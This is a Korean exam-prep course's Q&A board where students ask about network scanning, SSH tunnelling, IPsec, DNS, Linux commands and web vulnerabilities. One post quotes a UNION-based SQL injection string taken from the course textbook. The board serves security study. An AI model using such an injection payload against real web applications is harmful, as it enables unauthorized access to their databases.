2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박미열 2020-05-08
답변완료

114강 침해사고유형별시나리오 질문입니다.

들었던 강의 중에 가장 긴 80분 짜리였는데 아주 재미 있었습니다. 한가지 기초적인 질문인데요 로컬 포트 포워딩이나 리모트 포트 포워딩에서, 동작원리는 이해했는데, SSH server side 의 PC에서 SSH 요청을 받아 주는 22번 데몬을 구동하는 부분이 없는데요. ssh -L 이나 SSH -R 명령어를 사용하게 되면 상대편(SSH server)에 자동으로 데몬이 시작되는지 궁금합니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박용희 2020-05-03
답변완료

UDP 스캔 관련해서 문의합니다.

UDP 스캔의 기본 목적은 UDP 스캔 오픈 여부 확인에 있습니다. Target Port Open : 응답 X or UDP 응답 Target Port Close : ICMP unreachable ( type 3 , code 3 ) 의 패킷 수신으로 알고 있습니다. 그런데, 방화벽 정책에 의해 Filtered 되었을 때 ( 하지만, port 는 open 되어 있을 때) 의 구분을 어떻게 하는지 궁금합니다. 일반적으로 F/W 필터링 시, Drop 정책을 사용하여 응답이 없지만 Reject 정책으로 ICMP Unreachable 을 반환하는데 포트는 열려있지만 필터링 되었을 경우 state 를 close 로 판단 할 수 있다고 생각하는데 차이가 있을까요?? 세부적인 icmp 코드가 다른가요?

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

윤형준 2020-04-26
답변완료

82강 웹취약점 질문 입니다.

파일삽입 취약점 대응방안에서 만약 개발자가 반드시 include, require등의 함수를 사용해서 외부 URL등을 불러와서 구현을 해야 하는 경우라면 어떻게 대응해야 할까요? php.ini 파일에서 allow_url_fopen을 Off 하면 업무적으로 구현이 안될것 같은데요. 이럴경우는 관리자가 악의적인 파일이 있는지 잘 점검하는 방법 밖에 없는지요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박용희 2020-04-22
답변완료

2020 실기

안녕하십니까 정일영 교수님 이번에 지안패스를 통해 2020 실기 강의를 듣게 된 전선아라고 합니다. 다름이 아니라 2019년도 실기 강의에 비해 현저히 강의 수가 작은 걸 확인할 수 있었습니다. 반이 줄어들었는데 혹시 그 이유를 알 수 있을까요? 실기 강의 열심히 들어서 꼭 합격하겠습니다! 감사합니다.

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

전선아 2020-04-13
미답변

세션 타임아웃과 no cache에 대한 질문

강사님의 강의를 잘 듣고 있는 중입니다. 그 중에, 질문이 있어 이렇게 글을 남깁니다. 1. timeout에 대해서는 apache에서 httpd.conf의 timeout과 php.ini 파일에서 session.gc_maxlifetime이 있는 것으로 알고 있습니다. 혹시 여기에 우선순위가 존재하는지 궁금합니다.(혹시나 두개의 의미가 다르다면 설명 부탁 드립니다..) 2. html head에 보면 http 1.1버전에서 로 그 페이지의 no cache를 설정한다 하셨습니다. 그런데, proxy를 통해서 no-cache를 cache로 바꾼다면, 그 페이지에 대해서는 cache를 통해서 동작을 하게 되는지 궁금합니다. 혹은 보안조치를 해 놓으면 변경이 불가능하게 될까요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한정우 2020-03-31
답변완료

49강 질문입니다.

TCP SYN flooding 공격에 대한 대응책 중에서 (226 page), 방화벽 또는 DDoS 대응장비를 이용하여 동일 Client(IP)의 SYN 연결 요청에 대한 임계치 설정을 통해서 차단 한다고 설명 되어 있는데요. 이때 공격자는 동일 IP가 아니고 Source IP를 변경 하면서 공격 할건데,, 방어가 될지.. 올바른 표현인지 궁금합니다. 아니면 제가 이해를 잘못하고 있는건지 설명 부탁 합니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박용희 2020-03-19
답변완료

PFS에 대한 질문

안녕하세요 열심히 수업을 듣는 중에 계속 궁금한 점이 생깁니다.. DH을 사용할 경우에 p, g 값은 서로 전달하고, a와 b가 되는 각각의 개인키로 이산대수를 대입하여 p^a mod g 값이 서로 public key(반대편의 경우 p^b mod g)가 되는 것으로 알고 있습니다. 그리고, 각각이 계산한 p^ab mod g가 각각이 갖는 공통의 premaster key가 된다고 저는 이해했습니다. 1. 그렇다면 단축협상을 진행할 경우 master secret과 client random, server random으로 key block을 생성하게 되는데 이 값은 client random과 server random이 매 협상시마다 바뀌기 때문에 키 교환이 항상 새롭게 이루어진다는 말씀이신것이지요? 2. 그렇다면 PFS의 경우 DH에서만 사용이 가능하다고 하였습니다. 혹시 PFS는 여러 세션이 있으면 각각에 대한 순방향 비밀성이 이루어지는 건가요(2-1) 아니면 한 세션 내에서 단축협상을 이룰 때마다 만들어지는 건가요(2-2)? 2-1) 여러 세션에 대해 순방향이 이루어진다면 세션마다 완전 협상을 맺을 때 개인키는 같고 p, g값이 변경이 되기 때문에 premaster secret이 변경이 되어 PFS가 이루어지는 건가요? 2-2) 이 경우는... 불가능한 거 같아 보입니다.. 제가 질문을 어렵게 썼더라면 다시 한번 더 올리도록 하겠습니다... 바쁘실텐데 항상 답변 달아주심에 감사합니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한정우 2020-03-12
답변완료

66강. DNS 프로토콜 질문

질문 드립니다. dig에서 +norecurse 명령어를 치면 authoritative 네임서버가 반복적 질의를 수행하여 정상 응답 여부 점검이라고 설명을 해 주셨습니다. 그러면 명령어 dig @ns.algisa.com www.algisa.com +norecurse에서 본다면 ns.algisa.com이 iterative query로 질의를 하게 된다는 건가요? 예를 들어서 dig @ns.algisa.com www.naver.com +noecurse를 사용하게 된다면 사용자는 ns.algisa.com 네임서버로 recursive query를 하게 되고 ns.algisa.com이 iterative query로 root / 1차 / 2차 이렇게 순차적으로 query를 하게 되는 건가요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한정우 2020-03-07
답변완료

ping에 대한 궁금증

한번 올렸었는데 다시 한번 더 상세히 질문드립니다. ping이라는 건 icmp 기반으로 상대 host를 찾습니다. 그러려면 ip가 셋팅이 되어야 하고 mac주소가 셋팅이 되어야 할 겁니다.. 예를 들어서 host가 없는 ip에 ping을 치게 된다면 당사자 입장에서는 mac주소를 모를테니, mac 주소를 확인하는 arp를 로컬 네트워크에 전달을 하게 될거라 생각하고 그 arp request에 대한 응답이 없을테니 time exceeded로 나오는 건지 여쭈어 보았습니다.. (무선환경에서 확인하였지만 무선환경이라도 802.3 / 802.11 프레임(?)만 다르지 나머지는 같을거라 생각은 합니다..)

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한정우 2020-03-02
답변완료

6강 질문 입니다.

6강 15분 14초 부분에서요. find . -perm 4000 명령어를 하면 정확히 setuid 와 일치한것만 출력이 된다고 했는데요. 실행파일중에 suid.out 파일이 정확히 setuid와 일치하는거니 출력되어야 하는거 아닌가요? 제가 잘못 이해하고 있는것 같은데 추가 설명 부탁 드립니다. 이해가 안갑니다. 추가로 4000에서 4의 의미도 알려주세요. 2000의 의미도 부탁 합니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박용희 2020-02-28
답변완료

강좌 46. TCP ACK SCAN 질문 있습니다.

Q. TCP Ack Scan은 방화벽의 룰셋을 테스트하는 스캔이라고 하셨습니다. 그런데, 포트가 닫혀 있는 경우라면 방화벽 유무에 따라서 무응답 or RST 패킷으로 확인이 가능할 겁니다. 그런데 포트가 열려 있는 경우라면 Ack scan으로 어떻게 확인이 가능한가요? 방화벽 유무에 상관 없이 모두 응답없음으로 응답이 오는거 아닌가요?(방화벽이 존재하면 응답없음 or ICMP 에러 메시지이겠지만, 방화벽이 없다 하더라도 서버 입장에서 ACK를 바로 받으면 무시하는 걸로 알고 있습니다.) Q. 내부에 없는 IP에 ping을 하게 되면 mac주소를 모르니까 먼저 arp로 확인을 하는데 이 부분도 존재하지 않으니까 time exceeded로 나오게 되는건가요? (패킷 덤프를 떠 보면 arp 통신은 따로 없긴 합니다..)

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한정우 2020-02-23
답변완료

강좌 58. ESP 질문입니다

강의 내용을 확인해보면 맨 마지막 ESP 실습을 보여주실 때 IP가 10.10.10.180 / 10.10.10.170으로 보여주고 있었습니다. 서버 to 서버이기에 전송모드로 실습을 진행하신 것 같았습니다. 그런데 생각해보면 터널모드도 wireshark에서 똑같이 보일 거라고 생각됩니다만, Wireshark 내에서는 터널모드인지 전송모드인지는 구분할 수 없는 것이지요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한정우 2020-02-22
답변완료

강좌 46. TCP ACK SCAN 질문 있습니다.

책의 경우에 TCP ACK SCAN의 경우 "방화벽의 룰셋을 테스트 하기 위한 스캔이다."라고 되어 있습니다. 하지만, 강의 내용과 개요의 3번에 "stateful inspection인지 packet filtering F/W인지 점검할 목적으로 사용한다"으로 되어 있습니다. 1. 룰셋이란 제가 알기로 각 방화벽의 정책들을 의미하는 것으로 알고 있습니다. 룰셋을 테스트 하기 위한 스캔이다. 라는 말이 맞는 의미 인가요? 룰셋에 대한 정확한 정의를 알려주세요.. 2. 그렇다면 제가 이해한 stateful inspection이라면 TCP ACK SCAN을 하면 모두 F/W에서 필터링이 될 것이고, packet filtering이라면 서버에서 RST을 날릴테니, "TCP ACK SCAN은 F/W의 종류를 파악하는 방법이다"라고만 이야기 하는게 더 맞을까요??

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박재현 2020-02-03
답변완료

TCP Session Hijacking에 대한 질문입니다.

세션 하이재킹에서 (가) 개요의 3번에서 "Sequence Number를 예측하여 세션을 탈취하게 된다."라고 말씀을 하셨습니다. 그런데 강의 내용에서는 Attacker는 그냥 스니핑 중이라고만 말씀을 하셔서 세션 탈취를 못한다는 쪽으로 말씀을 하시는 것 같아서요..

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박재현 2020-02-02
답변완료

강좌 8. unix/linux기본학습_7 문의 입니다.

강의를 잘 듣고 있습니다. 이해가 쏙쏙 되는 중에 한가지 궁금증이 있어서 문의를 남깁니다. 1. shell이 다른 process를 실행할 때 fork가 되고 exec를 실행하여 이미지 전이를 한다고 합니다. 그러면서 foreground mode가 변경이 되는 것이라고 이해하였습니다. 이로써 서로 pid와 ppid 관계가 만들어지는 것이지요. 그런데, a.out이 foreground mode일 때 a.out이 같은 여러 process를 만들 때도 fork를 하여 똑가튼 a.out을 만드는 것으로 알고 있습니다. 그러면 a.out(parent)는 background mode, a.out(child)는 foreground mode가 되는 건가요? 아니면 위와 같은 논리가 성립이 되는 것이 아니라 다른 논리가 성립이 되는걸까요? session id 자체가 변경이 되는 걸까요? 말씀 중에 process group 단위로 이루어진다고 말씀을 하셔서 a.out의 parent와 child는 같은 mode가 이루어져야 할 것 같은데 이해가 조금 안됩니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박재현 2020-02-02
답변완료

68강 recursive dns 관련 named.conf 설정

allow-recursion {127.0.0.1;192.168.56.0/24}; 이 설정에서 루프백 주소가 들어가는데 혹시 어떤 이유가 있어서 들어가는건가요? 아니면 예시용으로 넣어 놓으신건가요

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

윤성일 2019-10-21
답변완료

시스템 보안 관련 실습하실때 관련 질문

1. stack buffer overflow공격 실습진행하실때 buffer size가 선언한대로 크기가 잡혔던 거 같은데 따로 ASLR이나 스택가드는 없이 진행하신건가요? 요즘 gdb로 보면 다 char buf[12]하면 12바이트 이상 잡던데요.. 제가 저번에 궁금해서 했다가 실패했던 기억이 드는데 바로 성공하신거 보니까 궁금합니다. 2. race condition에서 여러번 실행해서 몇 번 성공가능하다고 하셨는데 그게 context switching이 아예 안 일어날수 있어서 그런가요? 한번이라도 일어나면 성공되는거죠? 3. 추가적으로 윈도우즈 도메인에 대하여 정리를 해보았는데 맞는 것인지 확인차 질문드립니다. 윈도우즈 도메인이란. DC(domain controller)에 사용자 계정, 컴퓨터 및 장치들을 등록한후, 다른 컴퓨터에서 자신의 계정으로 로그인하여 DC에서 인증 받은후 자신의 컴퓨터처럼 로그인 가능한 네트워크이다. 라고 정리를 해보았습니다. 적절한지 궁금합니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

장원일 2019-10-04
답변완료

IPSec질문 있습니다.

안녕하세요 강의 정말 잘 듣고 있습니다 교수님. 한 가지 질문이 있어서 이렇게 올립니다. 교재로 보면 271페이지에 양쪽 터널/보안 게이트웨이 구간 ip패킷 보호 그림을 보면 제가 이해한 내용은 New_ip헤더가 보안 게이트웨이간 사용되는것이고 목적지 보안 게이트웨이에 도착을 하면 역캡슐화를 하여 원래의 ip헤더(오리지날)가 나와 게이트웨이에서 목적지로 전송하는 것으로 이해를 했습니다. 그리고 교수님께서 목적지 게이트웨이와 목적지 종단간에는 사내구간으로 보고 안전한다고 보고 간다고 말씀하셔서 잘 이해를 했는데, 270페이지에 똑같은 그림을 보면은 종단이랑 게이트웨이 구간에 원본 ip 헤더는 암호화되어 있기 때문에 터널/보안 게이트웨이와 종단 노드 구간의 트래픽 흐름의 기밀성이 보장된다고 나와있고 그렇게 설명해주셨는데 목적지 터널/보안게이트웨이 도착하면 역캡슐화되서 암호화도 풀리고 그 게이트웨이가 본래의 ip헤더를 보고 목적지로 보내주는 방식이 아닌가요? 설명이랑 책에는 목적지 도착까지 암호화 되있다고 나와있어서 혼란이 와서 이렇게 질문드립니다. 답변 부탁드리겠습니다!

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

이현구 2019-10-01
답변완료

Sleep과 Blocked상태 같은 상태인가요?

47페이지에서 ps -l의 결과에서 첫 번째 명령어 dbus-launch가 왜 있는지 궁금하고요.. 그리고 S필드에서 S상태면 (인터럽트가능한) sleep상태로 알고 있는데 이것이 Blocked상태랑 같은 의미로 볼 수 있나요? WCHAN필드에서 poll_s가 blocking system call이라고 말씀하셔서 그렇게 생각들었습니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

장원일 2019-09-28
답변완료

파일과 디렉터리 기본접근권한이란 단어에 대해서

기본접근 권한이 파일과 디렉터리에 대해 666 777이라고 말씀하셨는데 실무에서도 "기본접근 권한"이라는 용어를 사용하나요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

장원일 2019-09-28
미답변

ARP packet

ARP 관련 실습 참고자료에서 패킷길이를 32bit기준으로 나누셨는데 MAC주소의 경우 hardware length 6bytes가 되고, Protocol length가 4bytes가 되면 그림이 잘못나온거 같은데... 이해가 되지 않아서 질문 올립니다!

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

이동열 2019-09-07
답변완료

131강 전체 재생이 되지 않습니다.

131강 전체 재생이 되지 않습니다. 교수님이 말씀이 중간에 끊기네요. 확인부탁드립니다. 모바일 재생이며, 그리고 132강, 133강은 없는건가요? 체크 항목은 있는데. 안보이는 건지 확인 부탁드립니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

최영헌 2019-07-10
미답변

실기 이론교재 p167(Section 4 네트워크 기본학습)

(3)라우팅 경로 계산 II 에서 목적지 주소(10.0.122.100)과 왜 세번째행 Genmask(255,255,192,0)을 비트 And연산하는지 궁금합니다. 셋째행을 쓰는 다른 이유가 있나요? 두번째행의 Genmask(255,255,224,0) 등 을 쓰지 않는지요 감사합니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

송승민 2019-06-18
미답변

정보보안기사 필기 기출문제 풀어보고 싶습니다.

기출문제 최신 10회정도 풀어보고싶은데 어디서 자료를 구할 수 있나요??? 구글이나 알기사 홈페이지에서도 찾기 힘듭니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한현재 2019-06-17
미답변

RUID와 EUID가 나오는 부분이 어딘가요?

동영상강의를 순서대로 듣지 않고 필요한 부분이 있어 중간중간 들었는데, RUID와 EUID에 대해 앞서 설명했다는 부분이 있었어요. 시스템보안 부분인것 같은데 이 내용은 몇회차 영상을 봐야 들을 수 있을까요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

신소희 2019-06-12
미답변

Slow HTTP read Dos 질문 드립니다.

Slow HTTP Header/POST 대응방법으로 동일한 출발지IP 동시 연결개수 임계치 설정이 있는데요 Slow HTTP read Dos도 동시연결개수를 제한하면 되지 않나요? 제가 아직 TCP연결을 이해 못한건지 궁금합니다..;

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

백찬 2019-05-15
미답변

Syn flooding 대응방안 질문입니다.

DDos에서 Syn flooding 공격 대응책 중 방화벽 또는 DDoS대응장비를 이용하여 동일 Client(IP)의 연결요청에 대한 임계치(Threshhold) 설정을 통해 과도한 연결요청 발생을 차단한다고 하셨는데요 이 공격은 source IP를 랜덤한 주소로 바꾸기 때문에 위의 대응책은 소용 없지 않나요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

백찬 2019-05-14
미답변

자바 언어로 어떻게 보안을 할 수 있나요?

뜬금없는 질문이라 죄송하지만 기사준비를 하면서 원하는 회사 면접준비 중인데, 나왔던 질문중에 "자바언어로 어떻게 보안을 할 수 있나요?" 라는 질문이 나왔다는데 너무 막연한 질문이라, 한두줄로 어떻게 답변할지 감이 안옵니다. 도와주세요 강사님!!ㅜㅜ

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

김준래 2019-05-07
미답변

강사님 도와주세요

지금 3주도 남지 않은 상태인데 인강이 70여개정도 남았습니다 ㅠㅠ 인강을 들으면 반복할 시간이 없을텐데 정말 모르는 부분만 인강을 듣고 그렇지 않은 부분은 인강에 의지하지 않고 혼자 공부하고 문제풀이하는게 좋을까요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

김의연 2019-05-04
미답변

개인정보 보호법 질문있습니다.

예제들이 보면 회원가입 주가 되던데 개인이 요구할때도 해당하는지 궁금합니다. 예를들어 요즘 단톡방같은것도 특정 개인이 이름,연락처 학사정보등을 개인이 확인용으로 받는다며 받은 후, 해당 단톡방의 비밀번호를 알려주는 경우가 있는데 제가 메세지나 사진으로 전송한 정보를 어떻게 처리할지와 이용기간 등을 고지를 안해줘도 문제가 되는건가요?

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

김준래 2019-04-19
답변완료

iptables 질문

-m limit --limit 5/minute -j DROP -m recent --seconds 60 --hitcoundt 5 -j DROP 리미트는 분당 5개 초과한거 드랍이니까 다음 1분에 또 5개 찍혀서 분당 5개씩만 허용이고 힛카운트는 5개 초과시 영구적으로 계속 드랍인건가요? 책 예제에는 리미트로 로그만 찍어서 질문 드립니다.

2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

김준래 2019-04-09
미답변

SID번호에 대해서..

제꺼 SID를 찾아보니 SID가 503하고 504로 되어있는데 503하고 504도 게스트 식별자인가요?

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박상근 2019-02-02
미답변

가상머신에 실습 하기 위해 세팅하는 법

안녕하세요. 정보보안기사를 취득하기 위해 공부 중인 취준생입니다. 다름이 아니라 강의를 보는 중 강사님께서 실습을 하시던데 저도 실습을 하면서 학습 하고 싶으나 리눅스 등 다른 운영체제에 대해 공부한 적이 없어서 세팅하는 법을 찾아보고 있는데요. 혹시 앞으로 강의 내용(시스템,네트워크)을 실습 하기 위해 어떤 것을 세팅해놓으면 좋은지 알 수 있을까요?! 이와 같이 첨부파일과 같이 강사님처럼 직접해보면서 공부 하고 싶습니다!! 그리고 항상 강의를 통해 잘 가르쳐주셔서 감사합니다.^^ 날씨 추운데 감기 조심하세요

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

권혁준 2018-12-20
미답변

웹 어플리케이션 취약점 질문 드립니다

클라이언트에서만 검증을 하고 서버에서는 안했을때 Web Proxy 공격에 취약하다고 나왔는데요. Web proxy를 거쳐 가게하려면 클라이언트 웹브라우저에서 프록시 설정을 한다고 들었는데 공격자가 클라이언트 웹브라우저를 직접 설정하는것도 아니고 어떻게 하는건가요?

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

백찬 2018-12-06
미답변

프로세스랑 프로그램 구분이요

실행중인 프로그램을 프로세스라 하는걸로 알고있는데 서술형 문제에 프로세스 프로그램 구분 크게 해줘야하나요??

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

이태윤 2018-11-05
답변완료

Blind SQL Injection관련 질문입니다

강사님 강의 잘듣고 있습니다^^ 2018알기사책 페이지 355쪽 아래부분 게시판에서 제목 필드에 ' and 1=2 union select 'a','b','c','d','e','f','g','h','i'# 구문에서 union앞에 왜 1=1이 아닌 1=2를 넣는지가 궁금합니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

장수민 2018-10-23
답변완료

질문이 있습니다.

11번째 강의에서요 fedora crontab설정에서 netcat(nc)명령어를 사용하셨는데 fedora에 netcat을 미리 설치하신건가요 아니면 기본적으로 명령어가 되는건가요?

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

백찬 2018-10-18
답변완료

httpd.conf 파일 옵션 역할

안녕하세요 정보보안기사 실기 수강하고있는 수험생입니다 아파치기준 httpd.conf파일에서 Timeout 옵션이있는데 이 옵션은 session ID에 대한 만료시간인가요 ??? 아니면 단순히 네트워크 연결의 idle timeout기준인가요?? 연결 기준이라하면 root의 ssh 접속 임계치 기반 세션관리 처럼 동작하는 것

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

경대규 2018-10-12
답변완료

7강 40p 질문이요

강의 끝부분 46분 30초경에 find 명령어 관련해서 -size 3M 으로 입력했는데 ./big 이 나오잖아요?? 3M 면 3000000 이 아닌가요??? 왜 3145728인데 출력되는거죠?

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한준혁 2018-10-09
답변완료

IP 단편화 질문 드려요

IP는 비연결형 프로토콜이라 전송 순서가 일정하지 않다고 하셨는데 만약 Flag 비트 3번째 값이 0으로 설정되어있는게 마지막에 안오고 먼저 와버리면 수신자는 그대로 조합을 해버리는 건가요? 거기에 대한 설명이 안되있어서 질문드려요 ㅠㅠ 예를들어 3008byte의 Payload 가 있을때 마지막 단편인 48byte 가 두번째로 와버리면 어떻게 되는지 궁금합니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박창민 2018-09-27
답변완료

29강 루프백 관련해서 질문합니다.

127.0.0.1 로컬호스트로 핑을 해서 와이어샤크로 캡쳐가 안됬는데 보통 랜카드 상태를 확인하려고 로컬호스트 핑을 테스트 하지 않나요? 로컬호스트 핑 응답이 되면 랜카드가 작동하는 거고 타임아웃이 뜨면 랜카드도 고장난걸로 체크하는거로 알고있는데 만약 그렇다면 랜카드에다 핑을 날리는 것이니 와이어샤크에 찍어야 하는게 아닌지 궁금합니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박창민 2018-09-20
답변완료

find 옵션 질문이요

a라는 파일을 만들고 find -name "a" -exec ls {} \; 명령을 주면 결과가 이상하게 나옵니다. a라는 이름을 가진 파일만 나와야 하는것 아닌가요? type을 d로 줘도 하위 파일까지 다 나오는거 같고 옵션을 f로 해야만 제대로 나오네요 이유가 뭔지 궁금합니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박창민 2018-09-08
답변완료

32쪽 하드링크부분 질문드립니다.

a라는 파일에 대해 a.ln 하드링크 생성시 i-node 가 같은건 알고 있는데 그림에서 i-node 하나가 2개의 데이터블럭을 참고하는 화살표가 있어서 질문드립니다. 실제로 하드링크 파일을 생성해도 실제 데이터블럭은 그대로 아닌가요? 그림이 무슨 뜻인지 이해가 잘 안가네요. 그러니까 하드링크파일을 계속 생성해도 디스크의 용량은 변화가 없다는 걸로 아는데 제가 잘못 알고있는건가요? 어떻게 i-node 가 두개의 데이터블럭을 참조 할수가 있죠?

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박창민 2018-09-07
미답변

1강 다 듣고 질문 드립니다.

1. 윈도우 인증과정 순서가 winlogon 시스템이 시작되고 lsa 서브시스템에 의해 ntlm 과 sam 파일 비교가 작동하는게 맞나요? 2. ntlm 시스템이 가동하는게 challenge & response 인증을 하는 과정인가요? 3. challenge & response 인증은 리눅스처럼 md5 해시함수에 salt 값을 사용하여 해시값을 저장하는게 맞나요? 4. challenge & response 방식이 자신의 패스워드 + challenge 값을 통해 response 값을 만들어 그 response 값을 확인하는게 서버에서 서버가 알려준 challenge 값과 sam 파일에 저장된 해시값을 이용해 response 값을 대조하는 것이라면 결국 sam 파일에 있는 해시값과 그 때마다 생성되는 challenge 값을 이용해 response 값을 만들어 재전송하면 똑같이 재전송 공격에 취약한것 아닌가요? 3. lm 해시 ntlm 해시는 취약해 vista 이후로 ntlmv2 해시를 사용한다고 했습니다. ntlmv2 해시함수는 현재 사용되는 sha-512 같은 해시함수와 동일한 복잡도 인가요?

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박창민 2018-09-04
답변완료

port proxy 를 이용한 smb 운용

보안상 공중망에서 SMB포트(445) 가 막혀있어 Window pc에서는 netsh 를 이용한 port proxy 를 이용해서 445번 포트를 다른포트로 이용해서 서버로 접근하려합니다. 이렇게 구성할 경우 보안성이 우수해졌다고 볼 수 있을까요? 요약 클라이언트 ----------------------------------------------------------- 10.0.0.1(루프백ip) 445port 서버의 공인ip 1024이상의포트 서버측 네트워크 ----------------------------------------------------- 서버쪽 네트워크에서 외부 1024이상의 포트 ------- 서버의 사설ip 445번 포트로 포트포워딩 이렇게 구성하게 되면 클라이언트 측에서 \\10.0.0.1 <-- 루프백 이더넷의 경로를 통해 서버로 smb연결이 가능해지는데 smb연결이 보안상 위험하기 때문에 공중망에서 닫아둔걸로 아는데 이런 구성으로 할경우 보안성이 좋아졌다고 얘기할 수 있을까요?

2017 제9,10회 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

김태원 2018-05-08
답변완료

TCP 프로토콜 연결 종료 과정(4-Way Handshake)

연결 종료 과정 ①Client -> Server : FIN+ACK ②Server -> Client : ACK ③Server -> Client : FIN+ACK ④Client -> Server : ACK | 질문 : ACK가 수신 확인 응답과 함께 상대방의 다음에 전송할 SEQ 넘버를 알려주는 것으로 알고 있습니다. Server가 ACK를 보내고 다음에 FIN+ACK를 보내는데 굳이 ACK를 한번더 보내는 이유가 있나요??

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

박정민 2018-05-02
답변완료

강의 추가본 업로드는 언제되나요??

법률부분하고 강의 2개정도 빠져있던데 이부분 업로드는 언제 되는지 궁금합니다! 시험이 얼마 안남아서... 빨리 해주셨으면 좋겠네요 ㅠㅠ

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

김수호 2018-05-01
답변완료

find 의 -perm.. 질문합니다!

안녕하세요 강의 잘 듣고 있습니다. 7번강의에서 궁금한사항이 있습니다. find . -perm -4000 -o -perm -2000 할때 빠른논리연산 한다고 하는데, 앞쪽에서 트루 되지않나요? 왜 F 가 되고 ./sgid.dat 가 나오는지 이해가 안감니다.

2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]

한의양 2018-04-22
강의질문 더 보기

학습자료

  • 데이터가 존재하지 않습니다.